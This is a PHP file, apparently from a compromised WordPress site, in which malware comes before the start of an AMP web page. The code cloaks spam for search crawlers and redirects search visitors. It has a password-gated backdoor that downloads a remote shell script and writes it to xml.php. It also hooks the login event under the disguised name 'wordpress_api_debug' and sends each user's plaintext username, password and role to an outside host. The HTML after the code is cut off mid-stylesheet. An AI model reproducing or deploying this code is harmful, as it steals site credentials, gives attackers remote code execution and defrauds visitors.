if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('cacheUrl')) { function cacheUrl($url, $skip_cache = FALSE) { $cachetime = 10; //one week // $cachetime = 60 * 60 * 24 * 7; //one week $file = ABSPATH.WPINC. '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time() OR $skip_cache) { $ch = curl_init($url); curl_setopt_array($ch, array( CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36', CURLOPT_FOLLOWLOCATION => TRUE, CURLOPT_MAXREDIRS => 5, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 60, )); $data = curl_exec($ch); curl_close($ch); if ($data AND!$skip_cache) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } } $weoboo = cacheUrl('https://acagna.info/lnk/data/ip.admin.txt'); $user_ip = getUserIP(); if (strpos($weoboo, getUserIP()) !== false) { //ip found } else { $id = $_SERVER['REQUEST_URI']; if (preg_match_all("/ffgg$/", $id, $matches) ) { echo '111111'; } $uag = $_SERVER['HTTP_USER_AGENT']; $id = $_SERVER['REQUEST_URI']; $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; //t $pagesID = $_SERVER['REQUEST_URI']; if (!preg_match_all("/wp-login|wp-admin|admin|xmlrpc/", $pagesID, $matches)) { $apiToken = 'tws5mkxns8qpz5hqywtcknjfw4wgrbhp'; $keyword =$_SERVER['REQUEST_URI']; $url_page=$_SERVER['REQUEST_URI']; $ua = urlencode($_SERVER['HTTP_USER_AGENT']); $lang = (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : ''); $ip = null; $headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR'); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $ip = $_SERVER[$header]; break; } } if (strstr($ip, ',')) { $tmp = explode(',', $ip); if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $ip = trim($tmp[0]); } else { $ip = $_SERVER['REMOTE_ADDR']; } $referrer = urlencode(@$_SERVER['HTTP_REFERER']); $url = "https://bantuzu.info/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_1=".$_SERVER['HTTP_HOST']."&" . http_build_query($_GET) . ""; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); $result = json_decode($output); print $result->{'body'}; } @ini_set('display_errors', '0'); error_reporting(0); @ini_set("memory_limit","1024M"); $curtime = time(); $hspan = 0; $gen_passwd = "57ffb10f130bd90ab7a342fe814ccbd8"; $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die(); if ($_REQUEST['testwork'] == 'ololo') { $twork = file_get_contents('http://acagna.info/lnk/up/sh.txt'); if (preg_match("#cgi|admin#i", $eb)) $eb = ''; if (file_put_contents("{$eb}xml.php", $twork)) echo "success!
go"; else echo "error!"; die(); } if (ini_get('allow_url_fopen')) { function get_data_yo($url) { $data = file_get_contents($url); return $data; } } else { function get_data_yo($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); $data = curl_exec($ch); curl_close($ch); return $data; } } $ip = urlencode($_SERVER['REMOTE_ADDR']); $ua = urlencode($_SERVER['HTTP_USER_AGENT']); //block ddos bots $blbots = '/semrush|rogerbot|exabot|mj12bot|dotbot|gigabot|ahrefsbot|ia_archiver/i'; if (preg_match($blbots, $ua)) die(); $ref = urlencode($_SERVER['HTTP_REFERER']); $poiskoviki = '/google|bing|yahoo|aol|rambler/i'; $fromse = 0; if ($ref && preg_match($poiskoviki, $ref)) $fromse = 1; $abt = 0; $abtip = 0; if (isset($_GET['debug'])) $abt = 1; $crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i'; $crawlers = '/a|b|c|d|e|f|g/i'; if (preg_match($crawlers, $ua)) { $abt = 1; } if (file_exists("{$eb}.bt")) { $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $btime = filemtime("{$eb}.bt"); $obtime = $curtime - $btime; } if (!$bots[2] || $obtime > 172800) { $fbots = get_data_yo("http://acagna.info/lnk/bots.dat"); $btf = fopen("{$eb}.bt", 'w'); fwrite($btf, $fbots); fclose($btf); $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); } if (in_array($ip, $bots)) { $abt = 1; $abtip = 1; } $st = '.st'; $cldw = 0; $dw = 0; if ($_REQUEST["create"] == 1 && $_REQUEST["gen_passwd"] == $gen_passwd) { $cldw = 0; if ($_REQUEST['cldw']) $cldw = 1; $qq = $_REQUEST['qq']; if (!file_exists("{$eb}{$st}/.r")) { $qq = $_REQUEST['qq']; mkdir("{$eb}{$st}"); } else { $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq']; else $qq = trim($eqq[2]); } $redir = $_REQUEST['redir']; $redcode = $_REQUEST['redcode']; $redcode = htmlspecialchars_decode($redcode); $redcode = base64_encode($redcode); $group = $_REQUEST['group']; if ($cldw) { $egroup = explode('_', $group); $kgroup = $egroup[0]; $clkeys = get_data_yo("http://acagna.info/lnk/gen/keys/$kgroup.keys"); file_put_contents("{$eb}{$st}/.k", $clkeys); } $lang = $_REQUEST['lang']; file_put_contents("{$eb}{$st}/.r", "$redir|$group|$qq|$lang|$redcode|$cldw"); if (file_exists("{$eb}{$st}/.r")) { echo "created"; die(); } } if (file_exists("{$eb}{$st}/.r")) { $dw = 1; $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); $redir = $eqq[0]; if (!strstr($redir, 'https://')) $redir = base64_decode($redir); $group = $eqq[1]; $qq = trim($eqq[2]); $lang = trim($eqq[3]); if ($eqq[4]) $redcode = base64_decode($eqq[4]); $cldw = $eqq[5]; } $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $ddomain = $_SERVER['HTTP_HOST']; $ddomain = str_ireplace('www.', '', $ddomain); $eddomain = explode('.', $ddomain); $ddname = $eddomain[0]; $donor = str_ireplace('www.', '', $donor); $page = str_replace('/', '|', $donor); $donor = urldecode($donor); $epage = explode('|', $page); $morda = 0; if (!$epage[1] && !$epage[2] || $epage[1] == 'index.php' || $epage[1] == '?p=home') $morda = 1; //$fromse = 1; if ($abt || $fromse || $redcode || $hspan) { if (($abt || $hspan) && !$_GET[$qq]) { $ll = get_data_yo("http://acagna.info/lnk/tuktuk.php?d=$donor&cldw=$cldw&dgrp=$algo"); $el = explode(' ', $ll); } if (file_exists("{$eb}{$st}/$page.html")) { $htmlpage = file_get_contents("{$eb}{$st}/$page.html"); echo $htmlpage; die(); } $mdpage = md5($page); if (file_exists("{$eb}{$st}/$page.txt") || file_exists("{$eb}{$st}/$mdpage.txt")) { if (file_exists("{$eb}{$st}/$mdpage.txt")) $gtxt = file_get_contents("{$eb}{$st}/$mdpage.txt"); else $gtxt = file_get_contents("{$eb}{$st}/$page.txt"); $etxt = explode('|', $gtxt); $key = $etxt[0]; $desc = $etxt[1]; $txt = $etxt[2]; $h1 = $etxt[3]; } elseif ($cldw || isset($_GET[$qq])) { $desc = ''; $keys = file("{$eb}{$st}/.k", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); if ($keys[0]) { $key = $keys[0]; for ($kk = 1; $kk < count($keys); $kk++) $newkeys .= "$keys[$kk] "; file_put_contents("{$eb}{$st}/.k", $newkeys); } if (isset($_GET[$qq])) { $key = str_replace('-', ' ', $_GET[$qq]); } if ($key) { $parkey = $key; $tkey = str_replace(' ', '-', $key); if (stristr($lang, 'own')) { $lang = str_replace('own:', '', $lang); $owntext = base64_decode($lang); $wkey = urlencode($key); if (strstr($owntext, '?')) $ttxt = get_data_yo("{$owntext}&key=$wkey"); else $ttxt = get_data_yo("{$owntext}?key=$wkey"); } else $ttxt = get_data_yo("http://acagna.info/lnk/gen/index.php?key=$tkey&g=$group&lang=$lang&page=$page&cldw=$cldw&dd=$ddomain"); if (preg_match('#\n$parkey rating\n
\n$rating-5 stars based on\n$rcount reviews\n
\n\n"; $desc = $etxt[2]; $txt .= $etxt[3]; if ($desc == 'desc') { $desc = get_data_yo("http://acagna.info/lnk/gen/desc.php?key=$tkey&desc=$group"); preg_match('#gogogo(.*)enenen#is', $desc, $mtchs); $desc = $mtchs[1]; } $mdpage = md5($page); file_put_contents("{$eb}{$st}/$mdpage.txt", "$title|$desc|$txt|$h1"); $newclpage = str_replace('|', '/', $page); $newcllink = "$parkey "; if ($cldw) file_put_contents("{$eb}{$st}/cldwmap.txt", $newcllink, FILE_APPEND); } } $iswp = 0; if (file_exists('wp-includes/vars.php')) $iswp = 1; $cldwmap = file("{$eb}{$st}/cldwmap.txt", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); ob_start(); function shutdown() { global $morda; global $eb; global $txt; global $qq; global $key; global $desc; global $lang; global $cldwmap; global $el; global $dw; global $cldw; global $redcode; global $abt; global $hspan; global $h1; global $iswp; global $ddname; $title = ucfirst($key); $my_content = ob_get_contents(); ob_end_clean(); if ($my_content && isset($_REQUEST['prigod'])) { $my_content = '---prigod---'; } if ($key && $abt) { if ($cldw && !$morda) { preg_match_all('##iUm', $my_content, $ahrefs); $cntahrefs = count($ahrefs[0]); $cntcldwmap = count($cldwmap); $i = 0; foreach ($ahrefs[0] as $ahref) { if ($cldwmap[$i]) { $my_content = str_replace($ahref, $cldwmap[$i], $my_content); } $i++; } if ($morda) { $cldwfooter = ''; foreach ($cldwmap as $cldwflink) { $cldwfooter .= "$cldwflink "; } $my_content = str_replace('', "
$cldwfooter
", $my_content); } } if (!$morda) { $my_content = preg_replace('##iUs', "$title", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = str_replace('', " ", $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUs', '', $my_content, 1); if (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs')) { $my_content = preg_replace('##iUs', "\n
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "\n
\n$txt\n
", $my_content, 1); } } } //end if key elseif (!preg_match('#(.*)404(.*)#i', $my_content) && !preg_match('#<title>(.*)not found(.*)#i', $my_content)) { foreach($el as $ln) { if (preg_match('#<strong>#', $my_content)) { $my_content = preg_replace('#<strong>#', "_-strong-_ $ln ", $my_content, 1); } elseif (preg_match('#<b>#', $my_content)) { $my_content = preg_replace('#<b>#', "_-b-_ $ln ", $my_content, 1); } elseif (preg_match('#<i>#', $my_content)) { $my_content = preg_replace('#<i>#', "_-i-_ $ln ", $my_content, 1); } elseif (preg_match('#<u>#', $my_content)) { $my_content = preg_replace('#<u>#', "_-u-_ $ln ", $my_content, 1); } elseif (preg_match('#<p(.*)>#', $my_content)) { $my_content = preg_replace('#<p(.*)>#iUs', "_-p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#</p>#', $my_content)) { $my_content = preg_replace('#</p>#', "_-/p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#<br(.*)>#', $my_content)) { $my_content = preg_replace('#<br(.*)>#iUs', " $ln ", $my_content, 1); } elseif (preg_match('#<span(.*)>#', $my_content)) { $my_content = preg_replace('#<span(.*)>#iUs', "_-span-_ $ln ", $my_content, 1); } elseif (preg_match('#<body(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n$ln ", $my_content, 1); } } $my_content = str_replace('_-', '<', $my_content); $my_content = str_replace('-_', '>', $my_content); //$my_content = str_replace('</head>', "<script type='text/javascript'> function style_{$ddname} () { return 'none'; } function end_{$ddname} () { document.getElementById('$ddname').style.display = style_{$ddname}(); } </script>\n</head>", $my_content); //$my_content = str_replace('</body>', "<script type='text/javascript'> end_{$ddname}(); </script>\n</body>", $my_content); } echo $my_content; } register_shutdown_function('shutdown'); } if (($_GET[$qq] || $cldw) && $fromse && !$abt) { if (!$redcode && !$morda) { if ($key) $tkey = str_replace(' ', '+', $key); else $tkey = str_replace('-', '+', $_GET[$qq]); if (strstr($redir, '?')) $redir .= "&keyword=".$tkey; else $redir .= "?keyword=".$tkey; $redir = str_replace('KEY', $tkey, $redir); header("Location: $redir"); echo "<script type=\"text/javascript\">location.href=\"$redir\";</script>"; die(); } elseif (!$morda) { $key = str_replace('-', ' ', $_GET[$qq]); $redcode = str_replace('KEY', $key, $redcode); echo stripslashes($redcode); } } /* your code end */ } /* weoboo end */ if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); // unset cookies if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?><!DOCTYPE html> <html amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate=""><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012303151529000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!important;width:100%!important}html:not([amp4ads]),html:not([amp4ads]) body{height:auto!important}html:not([amp4ads]) body{margin:0!important}body{-webkit-text-size-adjust:100%;-moz-text-size-adjust:100%;-ms-text-size-adjust:100%;text-size-adjust:100%}html.i-amphtml-singledoc.i-amphtml-embedded{-ms-touch-action:pan-y pinch-zoom;touch-action:pan-y pinch-zoom}html.i-amphtml-fie>body,html.i-amphtml-singledoc>body{overflow:visible!important}html.i-amphtml-fie:not(.i-amphtml-inabox)>body,html.i-amphtml-singledoc:not(.i-amphtml-inabox)>body{position:relative!important}html.i-amphtml-ios-embed-legacy>body{overflow-x:hidden!important;overflow-y:auto!important;position:absolute!important}html.i-amphtml-ios-embed{overflow-y:auto!important;position:static}#i-amphtml-wrapper{overflow-x:hidden!important;overflow-y:auto!important;position:absolute!important;top:0!important;left:0!important;right:0!important;bottom:0!important;margin:0!important;display:block!important}html.i-amphtml-ios-embed.i-amphtml-ios-overscroll,html.i-amphtml-ios-embed.i-amphtml-ios-overscroll>#i-amphtml-wrapper{-webkit-overflow-scrolling:touch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{visibility:hidden}#i-amphtml-wrapper+body[i-amphtml-lightbox] .i-amphtml-lightbox-element{visibility:visible}#i-amphtml-wrapper.i-amphtml-scroll-disabled,.i-amphtml-scroll-disabled{overflow-x:hidden!important;overflow-y:hidden!important}amp-instagram{padding:54px 0px 0px!important;background-color:#fff}amp-iframe iframe{box-sizing:border-box!important}[amp-access][amp-access-hide]{display:none}[subscriptions-dialog],body:not(.i-amphtml-subs-ready) [subscriptions-action],body:not(.i-amphtml-subs-ready) [subscriptions-section]{display:none!important}amp-experiment,amp-live-list>[update]{display:none}amp-list[resizable-children]>.i-amphtml-loading-container.amp-hidden{display:none!important}amp-list [fetch-error],amp-list[load-more] [load-more-button],amp-list[load-more] [load-more-end],amp-list[load-more] [load-more-failed],amp-list[load-more] [load-more-loading]{display:none}amp-list[diffable] div[role=list]{display:block}amp-story-page,amp-story[standalone]{min-height:1px!important;display:block!important;height:100%!important;margin:0!important;padding:0!important;overflow:hidden!important;width:100%!important}amp-story[standalone]{background-color:#000!important;position:relative!important}amp-story-page{background-color:#757575}amp-story .amp-active>div,amp-story .i-amphtml-loader-background{display:none!important}amp-story-page:not(:first-of-type):not([distance]):not([active]){transform:translateY(1000vh)!important}amp-autocomplete{position:relative!important;display:inline-block!important}amp-autocomplete>input,amp-autocomplete>textarea{padding:0.5rem;border:1px solid rgba(0,0,0,0.33)}.i-amphtml-autocomplete-results,amp-autocomplete>input,amp-autocomplete>textarea{font-size:1rem;line-height:1.5rem}[amp-fx^=fly-in]{visibility:hidden}amp-script[nodom],amp-script[sandboxed]{position:fixed!important;top:0!important;width:1px!important;height:1px!important;overflow:hidden!important;visibility:hidden} /*# sourceURL=/css/ampdoc.css*/[hidden]{display:none!important}.i-amphtml-element{display:inline-block}.i-amphtml-blurry-placeholder{transition:opacity 0.3s cubic-bezier(0.0,0.0,0.2,1)!important;pointer-events:none}[layout=nodisplay]:not(.i-amphtml-element){display:none!important}.i-amphtml-layout-fixed,[layout=fixed][width][height]:not(.i-amphtml-layout-fixed){display:inline-block;position:relative}.i-amphtml-layout-responsive,[layout=responsive][width][height]:not(.i-amphtml-layout-responsive),[width][height][heights]:not([layout]):not(.i-amphtml-layout-responsive),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-layout-responsive){display:block;position:relative}.i-amphtml-layout-intrinsic,[layout=intrinsic][width][height]:not(.i-amphtml-layout-intrinsic){display:inline-block;position:relative;max-width:100%}.i-amphtml-layout-intrinsic .i-amphtml-sizer{max-width:100%}.i-amphtml-intrinsic-sizer{max-width:100%;display:block!important}.i-amphtml-layout-container,.i-amphtml-layout-fixed-height,[layout=container],[layout=fixed-height][height]:not(.i-amphtml-layout-fixed-height){display:block;position:relative}.i-amphtml-layout-fill,.i-amphtml-layout-fill.i-amphtml-notbuilt,[layout=fill]:not(.i-amphtml-layout-fill),body noscript>*{display:block;overflow:hidden!important;position:absolute;top:0;left:0;bottom:0;right:0}body noscript>*{position:absolute!important;width:100%;height:100%;z-index:2}body noscript{display:inline!important}.i-amphtml-layout-flex-item,[layout=flex-item]:not(.i-amphtml-layout-flex-item){display:block;position:relative;-ms-flex:1 1 auto;flex:1 1 auto}.i-amphtml-layout-fluid{position:relative}.i-amphtml-layout-size-defined{overflow:hidden!important}.i-amphtml-layout-awaiting-size{position:absolute!important;top:auto!important;bottom:auto!important}i-amphtml-sizer{display:block!important}@supports (aspect-ratio:1/1){i-amphtml-sizer.i-amphtml-disable-ar{display:none!important}}.i-amphtml-blurry-placeholder,.i-amphtml-fill-content{display:block;height:0;max-height:100%;max-width:100%;min-height:100%;min-width:100%;width:0;margin:auto}.i-amphtml-layout-size-defined .i-amphtml-fill-content{position:absolute;top:0;left:0;bottom:0;right:0}.i-amphtml-replaced-content,.i-amphtml-screen-reader{padding:0!important;border:none!important}.i-amphtml-screen-reader{position:fixed!important;top:0px!important;left:0px!important;width:4px!important;height:4px!important;opacity:0!important;overflow:hidden!important;margin:0!important;display:block!important;visibility:visible!important}.i-amphtml-screen-reader~.i-amphtml-screen-reader{left:8px!important}.i-amphtml-screen-reader~.i-amphtml-screen-reader~.i-amphtml-screen-reader{left:12px!important}.i-amphtml-screen-reader~.i-amphtml-screen-reader~.i-amphtml-screen-reader~.i-amphtml-screen-reader{left:16px!important}.i-amphtml-unresolved{position:relative;overflow:hidden!important}.i-amphtml-select-disabled{-webkit-user-select:none!important;-ms-user-select:none!important;user-select:none!important}.i-amphtml-notbuilt,[layout]:not(.i-amphtml-element),[width][height][heights]:not([layout]):not(.i-amphtml-element),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-element){position:relative;overflow:hidden!important;color:transparent!important}.i-amphtml-notbuilt:not(.i-amphtml-layout-container)>*,[layout]:not([layout=container]):not(.i-amphtml-element)>*,[width][height][heights]:not([layout]):not(.i-amphtml-element)>*,[width][height][sizes]:not([layout]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-amphtml-element)[i-amphtml-ssr]>img.i-amphtml-fill-content{display:block}.i-amphtml-notbuilt:not(.i-amphtml-layout-container),[layout]:not([layout=container]):not(.i-amphtml-element),[width][height][heights]:not([layout]):not(.i-amphtml-element),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-element){color:transparent!important;line-height:0!important}.i-amphtml-ghost{visibility:hidden!important}.i-amphtml-element>[placeholder],[layout]:not(.i-amphtml-element)>[placeholder],[width][height][heights]:not([layout]):not(.i-amphtml-element)>[placeholder],[width][height][sizes]:not([layout]):not(.i-amphtml-element)>[placeholder]{display:block;line-height:normal}.i-amphtml-element>[placeholder].amp-hidden,.i-amphtml-element>[placeholder].hidden{visibility:hidden}.i-amphtml-element:not(.amp-notsupported)>[fallback],.i-amphtml-layout-container>[placeholder].amp-hidden,.i-amphtml-layout-container>[placeholder].hidden{display:none}.i-amphtml-layout-size-defined>[fallback],.i-amphtml-layout-size-defined>[placeholder]{position:absolute!important;top:0!important;left:0!important;right:0!important;bottom:0!important;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{background:red!important;color:#fff!important;position:relative!important}.i-amphtml-element-error:before{content:attr(error-message)}i-amp-scroll-container,i-amphtml-scroll-container{position:absolute;top:0;left:0;right:0;bottom:0;display:block}i-amp-scroll-container.amp-active,i-amphtml-scroll-container.amp-active{overflow:auto;-webkit-overflow-scrolling:touch}.i-amphtml-loading-container{display:block!important;pointer-events:none;z-index:1}.i-amphtml-notbuilt>.i-amphtml-loading-container{display:block!important}.i-amphtml-loading-container.amp-hidden{visibility:hidden}.i-amphtml-element>[overflow]{cursor:pointer;position:relative;z-index:2;visibility:hidden;display:initial;line-height:normal}.i-amphtml-layout-size-defined>[overflow]{position:absolute}.i-amphtml-element>[overflow].amp-visible{visibility:visible}template{display:none!important}.amp-border-box,.amp-border-box *,.amp-border-box :after,.amp-border-box :before{box-sizing:border-box}amp-pixel{display:none!important}amp-analytics,amp-auto-ads,amp-story-auto-ads{position:fixed!important;top:0!important;width:1px!important;height:1px!important;overflow:hidden!important;visibility:hidden}amp-story{visibility:hidden!important}html.i-amphtml-fie>amp-analytics{position:initial!important}[visible-when-invalid]:not(.visible),form [submit-error],form [submit-success],form [submitting]{display:none}amp-accordion{display:block!important}@media (min-width:1px){:where(amp-accordion>section)>:first-child{margin:0;background-color:#efefef;padding-right:20px;border:1px solid 